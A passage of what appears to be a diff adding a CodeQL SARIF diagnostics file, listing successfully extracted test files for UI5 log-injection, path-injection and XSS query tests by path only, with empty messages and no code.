"descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 178 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 180 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 181 + } + } + } ], + "message" : { + "text" : "" + }, 
+ "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 182 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 183 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 184 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + 
"index" : 185 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 186 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 187 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 189 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 190 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 191 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 192 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 193 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 194 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 195 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 196 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + 
"locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 198 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 199 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", + "uriBaseId" : "%SRCROOT%", + "index" : 200 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : 
{ + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 201 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 202 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 203 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 204 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + 
"properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 205 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 207 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 208 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + 
} + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 209 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 210 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 211 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 212 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + 
"toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 213 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 214 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 215 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + 
"descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 217 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 218 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 219 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 
220 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 221 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 223 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", + 
"uriBaseId" : "%SRCROOT%", + "index" : 224 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 225 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 226 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 227 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 228 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 229 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 230 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 232 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 233 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 234 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 235 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ 
{ + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 236 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 237 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 